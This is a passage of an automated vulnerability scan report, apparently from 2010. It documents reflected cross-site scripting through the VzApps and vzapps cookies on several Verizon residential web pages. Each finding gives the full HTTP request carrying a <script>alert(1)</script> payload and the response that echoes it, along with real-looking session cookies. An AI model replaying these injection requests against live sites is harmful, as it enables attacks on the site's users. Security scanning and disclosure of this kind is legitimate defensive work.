MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73317
Expires: Sat, 20 Nov 2010 03:15:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXdd0c6<script>alert(1)</script>63779292418; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDD0C6<SCRIPT>ALERT(1)</SCRIPT>63779292418 </DIV>
...[SNIP]...

3.217. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 81278<script>alert(1)</script>87264888db4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX81278<script>alert(1)</script>87264888db4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74933
Expires: Sat, 20 Nov 2010 03:14:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX81278<script>alert(1)</script>87264888db4; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX81278<SCRIPT>ALERT(1)</SCRIPT>87264888DB4 </DIV>
...[SNIP]...

3.218. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16bd1'><script>alert(1)</script>1c358468da2 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX16bd1'><script>alert(1)</script>1c358468da2; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74937
Expires: Sat, 20 Nov 2010 03:14:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX16bd1'><script>alert(1)</script>1c358468da2; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX16BD1'><SCRIPT>ALERT(1)</SCRIPT>1C358468DA2 ' />
...[SNIP]...

3.219. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 9fca0<script>alert(1)</script>ac910a19ffb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9fca0<script>alert(1)</script>ac910a19ffb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74933
Expires: Sat, 20 Nov 2010 00:13:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9fca0<script>alert(1)</script>ac910a19ffb; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9FCA0<SCRIPT>ALERT(1)</SCRIPT>AC910A19FFB </DIV>
...[SNIP]...

3.220. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af68f'><script>alert(1)</script>63ed67becf9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXaf68f'><script>alert(1)</script>63ed67becf9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74936
Expires: Sat, 20 Nov 2010 00:13:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXaf68f'><script>alert(1)</script>63ed67becf9; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAF68F'><SCRIPT>ALERT(1)</SCRIPT>63ED67BECF9 ' />
...[SNIP]...

3.221. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8b391<script>alert(1)</script>ee2a020046a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8b391<script>alert(1)</script>ee2a020046a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 104004
Expires: Sat, 20 Nov 2010 00:10:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8b391<script>alert(1)</script>ee2a020046a; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8B391<SCRIPT>ALERT(1)</SCRIPT>EE2A020046A </DIV>
...[SNIP]...

3.222. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4dbaa'><script>alert(1)</script>f9ec6948bd6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4dbaa'><script>alert(1)</script>f9ec6948bd6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 104007
Expires: Sat, 20 Nov 2010 00:10:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4dbaa'><script>alert(1)</script>f9ec6948bd6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4DBAA'><SCRIPT>ALERT(1)</SCRIPT>F9EC6948BD6 ' />
...[SNIP]...

3.223. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5be15'><script>alert(1)</script>3c4e8eb8b2a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX5be15'><script>alert(1)</script>3c4e8eb8b2a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 199728
Expires: Sat, 20 Nov 2010 00:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5BE15'><SCRIPT>ALERT(1)</SCRIPT>3C4E8EB8B2A ' />
...[SNIP]...

3.224. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 1817e<script>alert(1)</script>dabad9477e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX1817e<script>alert(1)</script>dabad9477e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 201232
Expires: Sat, 20 Nov 2010 00:09:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:54 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:54 GMT; path=/
